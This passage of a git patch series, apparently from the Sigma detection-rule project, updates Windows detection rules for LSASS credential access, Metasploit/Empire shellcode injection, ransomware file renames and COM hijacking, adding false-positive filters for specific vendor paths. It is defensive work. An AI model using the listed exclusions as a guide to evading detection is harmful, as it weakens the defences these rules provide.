EP_PA:dst_ip_addr + matchType: exact + - sigmaField: DestinationHostname + laceworkField: + matchType: exact + action: raise + returns: + - HACM.BATCH_END_TIME + - HACM.BATCH_START_TIME + - HACM.DST_ENTITY_ID + - HACM.DST_ENTITY_TYPE + - HACM.DST_IN_BYTES + - HACM.DST_OUT_BYTES + - HACM.ENDPOINT_DETAILS + - HACM.NUM_CONNS + - HACM.SRC_ENTITY_ID + - HACM.SRC_ENTITY_TYPE + - HACM.SRC_IN_BYTES + - HACM.SRC_OUT_BYTES + alertProfile: LW_HA_CONNECTION_SUMMARY_DEFAULT_PROFILE.HA_Connection_Violation linux.process_creation: - evaluatorId: - source: LW_HE_PROCESSES + sources: + - LW_HE_PROCESSES conditions: # evaluated hourly and file create time within the last hour - and diff_minutes(PROCESS_START_TIME, current_timestamp_sec()::timestamp) <= 60 @@ -489,22 +519,18 @@ class LaceworkQuery: self.logsource_config = self.get_logsource_config( config, self.logsource_type, self.logsource_name) - # 3. Get Evaluator ID - self.evaluator_id = self.get_evaluator_id( - self.logsource_name, self.logsource_config) - - # 4. Get Query ID + # 3. Get Query ID self.title, self.query_id = self.get_query_id(rule) - # 5. Get Query Source - self.query_source = self.get_query_source( + # 4. Get Query Source + self.query_sources = self.get_query_sources( self.logsource_name, self.logsource_config) - # 6. Get Query Returns + # 5. Get Query Returns self.returns = self.get_query_returns( self.logsource_name, self.logsource_config) - # 7. Get Query Text + # 6. Get Query Text self.query_text = self.get_query_text(backend, conditions) def get_query_text(self, backend, rule_conditions): @@ -539,8 +565,9 @@ class LaceworkQuery: ' {source}\n' ' }}' ) + return source_block_template.format( - source=self.query_source + source=',\n '.join(self.query_sources) ) def get_query_return_block(self): @@ -555,7 +582,6 @@ class LaceworkQuery: def __iter__(self): for key, attr in { - 'evaluatorId': 'evaluator_id', 'queryId': 'query_id', 'queryText': 'query_text' }.items(): @@ -623,12 +649,6 @@ class LaceworkQuery: return logsource_config - @staticmethod - def get_evaluator_id(logsource_name, logsource_config): - # 3. validate service has an evaluatorId mapping - evaluator_id = safe_get(logsource_config, 'evaluatorId', str) - return evaluator_id if evaluator_id else None - @staticmethod def get_query_id(rule): title = safe_get(rule, 'title', str) or 'Unknown' @@ -638,15 +658,18 @@ class LaceworkQuery: return title, query_id @staticmethod - def get_query_source(logsource_name, logsource_config): + def get_query_sources(logsource_name, logsource_config) -> list[str]: # 4. validate service has a source mapping source = safe_get(logsource_config, 'source', str) + sources = safe_get(logsource_config, 'sources', list) - if not source: - raise BackendError( - f'Lacework backend could not determine source for logsource {logsource_name}') + if sources: + return sources + elif source: + return [source] - return source + raise BackendError( + f'Lacework backend could not determine source for logsource {logsource_name}') @staticmethod def get_query_returns(logsource_name, logsource_config): @@ -703,42 +726,37 @@ class LaceworkPolicy: self.logsource_config = LaceworkQuery.get_logsource_config( config, self.logsource_type, self.logsource_name) - # 3. Get Evaluator Id - self.evaluator_id = LaceworkQuery.get_evaluator_id( - self.logsource_name, self.logsource_config) - - # 4. Get Title - # 5. Get Query ID + # 3. Get Title + # 4. Get Query ID self.title, self.query_id = LaceworkQuery.get_query_id(rule) - # 6. Get Enabled + # 5. Get Enabled self.enabled = False - # 7. Get Policy Type + # 6. Get Policy Type self.policy_type = 'Violation' - # 8. Get Alert Enabled + # 7. Get Alert Enabled self.alert_enabled = False - # 9. Get Alert Profile + # 8. Get Alert Profile self.alert_profile = self.get_alert_profile( self.logsource_name, self.logsource_config) - # 10. Get Limit + # 9. Get Limit self.limit = 1000 - # 11. Get Severity + # 10. Get Severity self.severity = safe_get(rule, 'level', str) or 'medium' - # 12. Get Description + # 11. Get Description self.description = safe_get(rule, 'description', str) - # 13. Get Remediation + # 12. Get Remediation self.remediation = 'Remediation steps are not represented in Sigma rule specification' def __iter__(self): for key, attr in { - 'evaluatorId': 'evaluator_id', 'title': 'title', 'enabled': 'enabled', 'policyType': 'policy_type', From fda2ca4308d826ec7ee20df3b41e2cdf37330ab2 Mon Sep 17 00:00:00 2001 From: Veramine Date: Tue, 20 Sep 2022 17:20:19 -0700 Subject: [PATCH 73/96] Update proc_creation_win_commandline_path_traversal_evasion.yml Fix FP with Citrix launcher --- .../proc_creation_win_commandline_path_traversal_evasion.yml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml b/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml index 0c13c80cc..e63542221 100644 --- a/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml +++ b/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml @@ -24,8 +24,10 @@ detection: selection2: CommandLine|contains: '.exe\..\' filter: - CommandLine|contains: '\Google\Drive\googledrivesync.exe\..\' + - CommandLine|contains: '\Google\Drive\googledrivesync.exe\..\' + - CommandLine|contains: '\Citrix\Virtual Smart Card\Citrix.Authentication.VirtualSmartcard.Launcher.exe\..\' condition: 1 of selection* and not filter falsepositives: - Google Drive + - Citrix level: high From 411d79017eb8060b380bc977ccb43f61012cd112 Mon Sep 17 00:00:00 2001 From: Veramine Date: Tue, 20 Sep 2022 21:33:16 -0700 Subject: [PATCH 74/96] Update proc_creation_win_commandline_path_traversal_evasion.yml Changed to simpler CommandLine|contains and updated modified date. --- ...roc_creation_win_commandline_path_traversal_evasion.yml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml b/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml index e63542221..c0d988789 100644 --- a/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml +++ b/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml @@ -3,7 +3,7 @@ status: experimental id: 1327381e-6ab0-4f38-b583-4c1b8346a56b author: Christian Burkard date: 2021/10/26 -modified: 2022/02/02 +modified: 2022/09/20 description: Detects the attempt to evade or obfuscate the executed command on the CommandLine using bogus path traversal references: - https://twitter.com/hexacorn/status/1448037865435320323 @@ -24,8 +24,9 @@ detection: selection2: CommandLine|contains: '.exe\..\' filter: - - CommandLine|contains: '\Google\Drive\googledrivesync.exe\..\' - - CommandLine|contains: '\Citrix\Virtual Smart Card\Citrix.Authentication.VirtualSmartcard.Launcher.exe\..\' + CommandLine|contains: + - '\Google\Drive\googledrivesync.exe\..\' + - '\Citrix\Virtual Smart Card\Citrix.Authentication.VirtualSmartcard.Launcher.exe\..\' condition: 1 of selection* and not filter falsepositives: - Google Drive From 5fbebce70351d6bd68249d839d534cdb9f7d2b4e Mon Sep 17 00:00:00 2001 From: Veramine Date: Tue, 20 Sep 2022 21:45:45 -0700 Subject: [PATCH 75/96] Update proc_creation_win_commandline_path_traversal_evasion.yml Removed extra space after the hyphen --- .../proc_creation_win_commandline_path_traversal_evasion.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml b/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml index c0d988789..d5c4a6811 100644 --- a/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml +++ b/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml @@ -25,8 +25,8 @@ detection: CommandLine|contains: '.exe\..\' filter: CommandLine|contains: - - '\Google\Drive\googledrivesync.exe\..\' - - '\Citrix\Virtual Smart Card\Citrix.Authentication.VirtualSmartcard.Launcher.exe\..\' + - '\Google\Drive\googledrivesync.exe\..\' + - '\Citrix\Virtual Smart Card\Citrix.Authentication.VirtualSmartcard.Launcher.exe\..\' condition: 1 of selection* and not filter falsepositives: - Google Drive From 59530f49d47fde2b8b9c89c86f94811c8c040bfc Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Wed, 21 Sep 2022 11:53:39 +0200 Subject: [PATCH 76/96] Fix more FP in testing --- ...win_sysinternals_sdelete_file_deletion.yml | 30 ++++++---- .../file_event_win_susp_desktop_ini.yml | 35 ++++++----- .../file_rename_win_ransomware.yml | 11 ++-- .../image_load_side_load_antivirus.yml | 4 +- ...oad_side_load_from_non_system_location.yml | 3 +- .../image_load_susp_python_image_load.yml | 37 ++++++------ .../net_connection_win_python.yml | 21 ++++++- ...ion_win_susp_outbound_smtp_connections.yml | 7 ++- ...ccess_win_direct_syscall_ntopenprocess.yml | 6 ++ ...proc_access_win_rare_proc_access_lsass.yml | 7 ++- ...win_susp_proc_access_lsass_susp_source.yml | 9 +-- ...access_win_shellcode_inject_msf_empire.yml | 32 +++++++++- ...proc_creation_win_expand_cabinet_files.yml | 6 +- .../proc_creation_win_mstsc.yml | 3 +- ...proc_creation_win_susp_codepage_lookup.yml | 3 +- ...ete_removal_com_hijacking_registry_key.yml | 59 ++++++++++--------- 16 files changed, 176 insertions(+), 97 deletions(-) diff --git a/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml b/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml index be3e39dc3..03798c09f 100644 --- a/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml +++ b/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml @@ -4,22 +4,26 @@ status: test description: A General detection to trigger for the deletion of files by Sysinternals SDelete. It looks for the common name pattern used to rename files. author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) references: - - https://github.com/OTRF/detection-hackathon-apt29/issues/9 - - https://threathunterplaybook.com/evals/apt29/detections/4.B.4_83D62033-105A-4A02-8B75-DAB52D8D51EC.html + - https://github.com/OTRF/detection-hackathon-apt29/issues/9 + - https://threathunterplaybook.com/evals/apt29/detections/4.B.4_83D62033-105A-4A02-8B75-DAB52D8D51EC.html date: 2020/05/02 -modified: 2021/11/27 +modified: 2022/09/21 logsource: - product: windows - category: file_delete + product: windows + category: file_delete detection: - selection: - TargetFilename|endswith: - - '.AAA' - - '.ZZZ' - condition: selection + selection: + TargetFilename|endswith: + - '.AAA' + - '.ZZZ' + filter_wireshark: + # This event occurs when (un)installing wireshark + TargetFilename: 'C:\Program Files\Wireshark\radius\dictionary.alcatel-lucent.aaa' + condition: selection falsepositives: - - Legitime usage of SDelete + - Legitime usage of SDelete + - An FP may occure if the installation directory of wireshark is changed level: medium tags: - - attack.defense_evasion - - attack.t1070.004 + - attack.defense_evasion + - attack.t1070.004 diff --git a/rules/windows/file_event/file_event_win_susp_desktop_ini.yml b/rules/windows/file_event/file_event_win_susp_desktop_ini.yml index 3dbda7a44..3ac6496fb 100755 --- a/rules/windows/file_event/file_event_win_susp_desktop_ini.yml +++ b/rules/windows/file_event/file_event_win_susp_desktop_ini.yml @@ -4,25 +4,28 @@ status: test description: Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk. author: Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO) references: - - https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/ + - https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/ date: 2020/03/19 -modified: 2021/12/03 +modified: 2022/09/20 logsource: - product: windows - category: file_event + product: windows + category: file_event detection: - selection: - TargetFilename|endswith: '\desktop.ini' - filter: - Image|startswith: - - 'C:\Windows\' - - 'C:\Program Files\' - - 'C:\Program Files (x86)\' - condition: selection and not filter + selection: + TargetFilename|endswith: '\desktop.ini' + filter_generic: + Image|startswith: + - 'C:\Windows\' + - 'C:\Program Files\' + - 'C:\Program Files (x86)\' + filter_jetbrains: + Image|endswith: '\AppData\Local\JetBrains\Toolbox\bin\7z.exe' + TargetFilename|contains: '\JetBrains\apps\' + condition: selection and not 1 of filter_* falsepositives: - - Operations performed through Windows SCCM or equivalent - - Read only access list authority + - Operations performed through Windows SCCM or equivalent + - Read only access list authority level: medium tags: - - attack.persistence - - attack.t1547.009 + - attack.persistence + - attack.t1547.009 diff --git a/rules/windows/file_rename/file_rename_win_ransomware.yml b/rules/windows/file_rename/file_rename_win_ransomware.yml index 72d05ff25..3926f3b6e 100644 --- a/rules/windows/file_rename/file_rename_win_ransomware.yml +++ b/rules/windows/file_rename/file_rename_win_ransomware.yml @@ -7,7 +7,7 @@ references: - https://blog.cyble.com/2022/08/10/onyx-ransomware-renames-its-leak-site-to-vsop/ author: frack113 date: 2022/07/16 -modified: 2022/08/31 +modified: 2022/09/20 tags: - attack.impact - attack.t1486 @@ -26,7 +26,7 @@ detection: - '.jpeg' - '.png' - '.pdf' - TargetFilename|contains: + TargetFilename|contains: - '.lnk.' - '.rtf.' - '.pst.' @@ -36,7 +36,7 @@ detection: - '.jpeg.' - '.png.' - '.pdf.' - filter: + filter_generic: TargetFilename|endswith: - '.tmp' - '.bak' @@ -44,7 +44,10 @@ detection: - '.orig' - '.backup' - '.temp' - condition: selection and not filter + filter_anaconda: + TargetFilename|startswith: 'C:\ProgramData\Anaconda3\' + TargetFilename|endswith: '.c~' + condition: selection and not 1 of filter_* falsepositives: - Backup software level: medium diff --git a/rules/windows/image_load/image_load_side_load_antivirus.yml b/rules/windows/image_load/image_load_side_load_antivirus.yml index fd929f098..f2198619d 100644 --- a/rules/windows/image_load/image_load_side_load_antivirus.yml +++ b/rules/windows/image_load/image_load_side_load_antivirus.yml @@ -42,5 +42,7 @@ detection: - 'C:\Program Files (x86)\McAfee\' condition: (selection_bitdefender and not filter_bitdefender) or (selection_fsecure and not filter_fsecure) or (selection_mcafee and not filter_mcafee) falsepositives: - - Unknown + - Applications that load the same dlls mentioned in the detection section. Investigate them and filter them out if a lot FPs are caused. + - Dell SARemediation pulgin folder (C:\Program Files\Dell\SARemediation\plugin\log.dll) is known to contain the 'log.dll' file. + - The Canon MyPrinter folder 'C:\Program Files\Canon\MyPrinter\' is known to contain the 'log.dll' file level: medium diff --git a/rules/windows/image_load/image_load_side_load_from_non_system_location.yml b/rules/windows/image_load/image_load_side_load_from_non_system_location.yml index de8fc8740..922ae270e 100644 --- a/rules/windows/image_load/image_load_side_load_from_non_system_location.yml +++ b/rules/windows/image_load/image_load_side_load_from_non_system_location.yml @@ -416,8 +416,7 @@ detection: - 'C:\Windows\SysWOW64\' - 'C:\Windows\WinSxS\' - 'C:\Windows\SoftwareDistribution\' - filter_systemp: - ImageLoaded|startswith: 'C:\Windows\SystemTemp\' + - 'C:\Windows\SystemTemp\' filter_appvpolicy: ImageLoaded: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVPolicy.dll Image: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe diff --git a/rules/windows/image_load/image_load_susp_python_image_load.yml b/rules/windows/image_load/image_load_susp_python_image_load.yml index 79b4ceff8..8ddb710a6 100644 --- a/rules/windows/image_load/image_load_susp_python_image_load.yml +++ b/rules/windows/image_load/image_load_susp_python_image_load.yml @@ -6,26 +6,27 @@ date: 2020/05/03 modified: 2021/12/05 author: Patrick St. John, OTR (Open Threat Research) tags: - - attack.defense_evasion - - attack.t1027.002 + - attack.defense_evasion + - attack.t1027.002 references: - - https://www.py2exe.org/ - - https://unit42.paloaltonetworks.com/unit-42-technical-analysis-seaduke/ + - https://www.py2exe.org/ + - https://unit42.paloaltonetworks.com/unit-42-technical-analysis-seaduke/ logsource: - product: windows - category: image_load + product: windows + category: image_load detection: - selection: - Description: 'Python Core' - filter: - - Image|contains: - - 'Python' # FPs with python38.dll, python.exe etc. - - Image|startswith: - - 'C:\Program Files\' - - 'C:\Program Files (x86)\' - condition: selection and not filter + selection: + Description: 'Python Core' + filter: + - Image|contains: + - 'Python' # FPs with python38.dll, python.exe etc. + - Image|startswith: + - 'C:\Program Files\' + - 'C:\Program Files (x86)\' + condition: selection and not filter fields: - - Description + - Description falsepositives: - - Legit Py2Exe Binaries -level: medium \ No newline at end of file + - Legit Py2Exe Binaries + - Known false positive caused with anaconda installation/update +level: medium diff --git a/rules/windows/network_connection/net_connection_win_python.yml b/rules/windows/network_connection/net_connection_win_python.yml index 5e0ec8245..bc3737dcb 100644 --- a/rules/windows/network_connection/net_connection_win_python.yml +++ b/rules/windows/network_connection/net_connection_win_python.yml @@ -7,7 +7,7 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-4---port-scan-using-python - https://pypi.org/project/scapy/ date: 2021/12/10 -modified: 2022/08/12 +modified: 2022/09/20 logsource: category: network_connection product: windows @@ -15,7 +15,24 @@ detection: selection: Initiated: 'true' Image|contains: python - condition: selection + filter_conda: + # Related to anaconda updates. Command example: "conda update conda" + # This filter will only work with aurora agent enriched data as Sysmon EID 3 doesn't contain CommandLine nor ParentImage + ParentImage: C:\ProgramData\Anaconda3\Scripts\conda.exe + CommandLine|contains|all: + - 'C:\ProgramData\Anaconda3\Scripts\conda-script.py' + - 'update' + filter_conda_jupyter_notebook: + # Related to anaconda opening an instance of Jupyter Notebook + # This filter will only work with aurora agent enriched data as Sysmon EID 3 doesn't contain CommandLine nor ParentImage + ParentImage: C:\ProgramData\Anaconda3\python.exe + CommandLine|contains|all: + - 'C:\ProgramData\Anaconda3\Scripts\jupyter-notebook-script.py' + filter_local_communication: + # This coumd be caused when launching an instance of Jupyter Notebook locally for example but can also be caused by other instances of python openning sockets locally etc. So comment this out if you want to monitor for those instances + DestinationIp: 127.0.0.1 + SourceIp: 127.0.0.1 + condition: selection and not 1 of filter_* falsepositives: - Legitimate python script level: medium diff --git a/rules/windows/network_connection/net_connection_win_susp_outbound_smtp_connections.yml b/rules/windows/network_connection/net_connection_win_susp_outbound_smtp_connections.yml index 89a6e4bf1..7612f4a7b 100644 --- a/rules/windows/network_connection/net_connection_win_susp_outbound_smtp_connections.yml +++ b/rules/windows/network_connection/net_connection_win_susp_outbound_smtp_connections.yml @@ -9,7 +9,7 @@ references: - https://www.ietf.org/rfc/rfc2821.txt author: frack113 date: 2022/01/07 -modified: 2022/02/16 +modified: 2022/09/21 logsource: category: network_connection product: windows @@ -27,7 +27,10 @@ detection: - \outlook.exe filter_mailserver: Image|startswith: 'C:\Program Files\Microsoft\Exchange Server\' - condition: selection and not 1 of filter* + filter_outlook: + Image|startswith: 'C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_' + Image|endswith: '\HxTsr.exe' + condition: selection and not 1 of filter_* falsepositives: - Other SMTP tools level: medium diff --git a/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml b/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml index c0a3ec60a..30041efde 100755 --- a/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml +++ b/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml @@ -44,6 +44,12 @@ detection: falsepositive10: # MS Teams TargetImage|endswith: '\AppData\Local\Microsoft\Teams\current\Teams.exe' SourceImage|endswith: '\AppData\Local\Microsoft\Teams\current\Teams.exe' + falsepositives11: + TargetImage: 'C:\Windows\System32\backgroundTaskHost.exe' + SourceImage: 'C:\Windows\System32\backgroundTaskHost.exe' + falsepositives12: + TargetImage: 'C:\Program Files (x86)\CCleaner Browser\Application\CCleanerBrowser.exe' + SourceImage: 'C:\Program Files (x86)\CCleaner Browser\Application\CCleanerBrowser.exe' falsepositive_kerneltrace_edge: # Cases in which the CallTrace is just e.g. 'UNKNOWN(19290435374)' from Microsoft-Windows-Kernel-Audit-API-Calls provider Provider_Name: 'Microsoft-Windows-Kernel-Audit-API-Calls' condition: selection and not 1 of falsepositive* diff --git a/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml b/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml index 26a7bf029..e9f723900 100644 --- a/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml +++ b/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml @@ -7,7 +7,7 @@ status: experimental description: Detects process access to LSASS memory with suspicious access flags 0x410 and 0x01410 (spin-off of similar rule) author: Florian Roth date: 2022/03/13 -modified: 2022/09/18 +modified: 2022/09/20 references: - https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights - https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow @@ -38,8 +38,8 @@ detection: - 'C:\Windows\System32\lsass.exe' - 'C:\WINDOWS\System32\perfmon.exe' - 'C:\WINDOWS\system32\wbem\wmiprvse.exe' - - 'C:\Windows\sysWOW64\wbem\wmiprvse.exe' - - 'C:\Program Files\Common Files\McAfee\MMSSHost\MMSSHOST.exe' + - 'C:\Windows\sysWOW64\wbem\wmiprvse.exe' + - 'C:\Program Files\Common Files\McAfee\MMSSHost\MMSSHOST.exe' # Windows Defender filter2: SourceImage|startswith: 'C:\ProgramData\Microsoft\Windows Defender\' @@ -92,6 +92,7 @@ detection: - '\MBAMInstallerService.exe' - '\WebEx\WebexHost.exe ' - '\Programs\Microsoft VS Code\Code.exe' + - '\JetBrains\Toolbox\bin\jetbrains-toolbox.exe' filter_xampp: SourceImage|endswith: '\xampp-control.exe' GrantedAccess: '0x410' diff --git a/rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml b/rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml index e984d6e97..726d944dc 100644 --- a/rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml +++ b/rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml @@ -4,7 +4,7 @@ status: experimental description: Detects process access to LSASS memory with suspicious access flags and from a suspicious folder author: Florian Roth date: 2021/11/27 -modified: 2022/07/07 +modified: 2022/09/20 references: - https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights - https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow @@ -65,6 +65,7 @@ detection: - '\MBAMInstallerService.exe' - '\WebexMTA.exe' - '\WebEx\WebexHost.exe' + - '\JetBrains\Toolbox\bin\jetbrains-toolbox.exe' GrantedAccess: '0x410' filter2: SourceImage|startswith: 'C:\Windows\Temp\' @@ -84,9 +85,9 @@ detection: - '\vs_bootstrapper_' GrantedAccess: '0x1410' filter_chrome: - SourceImage|startswith: 'C:\Program Files (x86)\Google\Temp\' - SourceImage|endswith: '.tmp\GoogleUpdate.exe' - GrantedAccess: '0x410' + SourceImage|startswith: 'C:\Program Files (x86)\Google\Temp\' + SourceImage|endswith: '.tmp\GoogleUpdate.exe' + GrantedAccess: '0x410' condition: selection and not 1 of filter* fields: - User diff --git a/rules/windows/process_access/process_access_win_shellcode_inject_msf_empire.yml b/rules/windows/process_access/process_access_win_shellcode_inject_msf_empire.yml index 171a30883..b495e82c8 100644 --- a/rules/windows/process_access/process_access_win_shellcode_inject_msf_empire.yml +++ b/rules/windows/process_access/process_access_win_shellcode_inject_msf_empire.yml @@ -4,6 +4,7 @@ status: experimental description: Detects shellcode injection by Metasploit's migrate and Empire's psinject author: Bhabesh Raj date: 2022/03/11 +modified: 2022/09/21 tags: - attack.defense_evasion - attack.privilege_escalation @@ -13,11 +14,38 @@ logsource: product: windows detection: selection: - GrantedAccess: + GrantedAccess: - '0x147a' - '0x1f3fff' CallTrace|contains: 'UNKNOWN' - condition: selection + filter_dell_folders: + # If dell software is installed we get matches like these + # Example 1: + # SourceImage: C:\Program Files\Dell\SupportAssistAgent\bin\SupportAssistAgent.exe + # TargetImage: C:\Program Files\Dell\TechHub\Dell.TechHub.exe + # GrantedAccess: 0x1F3FFF + # Example 2: + # SourceImage: C:\Program Files (x86)\Dell\UpdateService\DCF\Dell.DCF.UA.Bradbury.API.SubAgent.exe + # TargetImage: C:\Program Files\Dell\TechHub\Dell.TechHub.exe + # GrantedAccess: 0x1F3FFF + # Example 3: + # SourceImage: C:\Program Files\Dell\TechHub\Dell.TechHub.exe + # TargetImage: C:\Program Files (x86)\Dell\UpdateService\DCF\Dell.DCF.UA.Bradbury.API.SubAgent.exe + # GrantedAccess: 0x1F3FFF + SourceImage|startswith: + - 'C:\Program Files\Dell\' + - 'C:\Program Files (x86)\Dell\' + TargetImage|startswith: + - 'C:\Program Files\Dell\' + - 'C:\Program Files (x86)\Dell\' + GrantedAccess: 0x1F3FFF + CallTrace|startswith: 'C:\Windows\System32\ntdll.dll' + filter_dell_specifc: + SourceImage: C:\Program Files (x86)\Dell\UpdateService\ServiceShell.exe + TargetImage: C:\Windows\Explorer.EXE + GrantedAccess: 0x1F3FFF + CallTrace|startswith: 'C:\Windows\System32\ntdll.dll' + condition: selection and not 1 of filter_* falsepositives: - Empire's csharp_exe payload uses 0x1f3fff for process enumeration as well level: high \ No newline at end of file diff --git a/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml b/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml index 1202cc9f2..7bc952889 100644 --- a/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml +++ b/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml @@ -25,7 +25,11 @@ detection: - 'C:\Public\' - '\AppData\Local\Temp\' - '\AppData\Roaming\Temp\' - condition: selection + filter_dell: + # Launched by Dell ServiceShell.exe + ParentImage: 'C:\Program Files (x86)\Dell\UpdateService\ServiceShell.exe' + CommandLine|contains: 'C:\ProgramData\Dell\UpdateService\Temp\' + condition: selection and not 1 of filter_* fields: - ComputerName - User diff --git a/rules/windows/process_creation/proc_creation_win_mstsc.yml b/rules/windows/process_creation/proc_creation_win_mstsc.yml index 20df29533..9278e5b04 100644 --- a/rules/windows/process_creation/proc_creation_win_mstsc.yml +++ b/rules/windows/process_creation/proc_creation_win_mstsc.yml @@ -7,7 +7,7 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc date: 2022/01/07 -modified: 2022/09/20 +modified: 2022/09/21 logsource: category: process_creation product: windows @@ -27,6 +27,7 @@ detection: - ' /p' filter_mstsc_1: ParentImage: 'C:\Windows\System32\lxss\wslhost.exe' + CommandLine|contains: 'C:\ProgramData\Microsoft\WSL\wslg.rdp' condition: all of selection_mstsc* and not 1 of filter_mstsc_* or all of selection_cmdkey* falsepositives: - Unknown diff --git a/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml b/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml index fabb0e86f..fb9250c74 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml @@ -27,7 +27,8 @@ fields: - CommandLine - ParentCommandLine falsepositives: - - Unknown + - During Anaconda update the 'conda.exe' process will eventually launch the command described in the detection section + - Other currently unknown cases level: high tags: - attack.discovery diff --git a/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml b/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml index c6c92af1f..6b6ec4ec7 100644 --- a/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml +++ b/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml @@ -4,36 +4,41 @@ status: test description: A General detection to trigger for processes removing .*\shell\open\command registry keys. Registry keys that might have been used for COM hijacking activities. author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) references: - - https://github.com/OTRF/detection-hackathon-apt29/issues/7 - - https://threathunterplaybook.com/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.html - - https://docs.microsoft.com/en-us/windows/win32/shell/launch - - https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand - - https://docs.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code + - https://github.com/OTRF/detection-hackathon-apt29/issues/7 + - https://threathunterplaybook.com/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.html + - https://docs.microsoft.com/en-us/windows/win32/shell/launch + - https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand + - https://docs.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code date: 2020/05/02 -modified: 2022/03/26 +modified: 2022/09/21 logsource: - product: windows - category: registry_delete + product: windows + category: registry_delete detection: - selection: - EventType: 'DeleteKey' - TargetObject|endswith: '\shell\open\command' - filter_svchost: - Image: 'C:\Windows\system32\svchost.exe' - filter_office: - Image|startswith: - - 'C:\Program Files\Common Files\Microsoft Shared\ClickToRun\' - - 'C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\' - Image|endswith: '\OfficeClickToRun.exe' - filter_integrator: - Image: 'C:\Program Files (x86)\Microsoft Office\root\integration\integrator.exe' - filter_dropbox: - Image|endswith: '\Dropbox.exe' - TargetObject|startswith: 'HKCR\Dropbox.' - condition: selection and not 1 of filter_* + selection: + EventType: 'DeleteKey' + TargetObject|endswith: '\shell\open\command' + filter_svchost: + Image: 'C:\Windows\system32\svchost.exe' + filter_office: + Image|startswith: + - 'C:\Program Files\Common Files\Microsoft Shared\ClickToRun\' + - 'C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\' + Image|endswith: '\OfficeClickToRun.exe' + filter_integrator: + Image: 'C:\Program Files (x86)\Microsoft Office\root\integration\integrator.exe' + filter_dropbox: + Image|endswith: '\Dropbox.exe' + # We don't use the HKCR anchor as it could be logged 